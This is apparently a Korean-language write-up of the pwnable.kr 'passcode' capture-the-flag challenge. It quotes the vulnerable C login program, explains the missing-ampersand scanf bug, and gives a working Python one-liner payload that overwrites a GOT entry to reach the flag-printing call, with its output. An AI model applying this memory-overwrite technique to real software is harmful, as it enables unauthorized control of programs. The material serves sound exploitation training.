Mommy told me to make a passcode based login system.
My initial C code was compiled without any error!
Well, there was some compiler warning, but who cares about that?
ssh passcode@pwnable.kr -p2222 (pw:guest)
파일 목록을 보았다.
passcode@pwnable:~$lsflagpasscodepasscode.c
passcode.c의 내용은 아래와 같다.
passcode@pwnable:~$ cat passcode.c#include<stdio.h>#include<stdlib.h>voidlogin(){int passcode1;int passcode2;printf("enter passcode1 : ");scanf("%d", passcode1);fflush(stdin);// ha! mommy told me that 32bit is vulnerable to bruteforcing :)printf("enter passcode2 : ");scanf("%d", passcode2);printf("checking...\n");if(passcode1==338150&& passcode2==13371337){printf("Login OK!\n");system("/bin/cat flag"); }else{printf("Login Failed!\n");exit(0); }}voidwelcome(){char name[100];printf("enter you name : ");scanf("%100s", name);printf("Welcome %s!\n", name);}intmain(){printf("Toddler's Secure Login System 1.0 beta.\n");welcome();login();// something after login...printf("Now I can safely trust you that you have credential :)\n");return0;}
10번째, 15번째 줄을 보면 &가 없어 passcode1이나 passcode2에 값이 저장되는 것이 아니라 passcode1과 passcode2를 주소로 한 곳에 저장된다.
scanf("%d", passcode1) 의 표준 입력 형식이 %d 이므로 정수 값으로 넘겨주어야 한다.
0x080485e3는 decimal으로 134514147이다.
아래와 같이 입력해 플래그를 알아낸다.
passcode@pwnable:~$python-c"print('A' * 96 + '\x04\xa0\x04\x08' + '134514147')"|./passcodeToddler's Secure Login System 1.0 beta.enter you name : Welcome AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA!
Sorry mom.. I got confused about scanf usage :(enter passcode1 : Now I can safely trust you that you have credential :)
Flag? : Sorry mom.. I got confused about scanf usage :(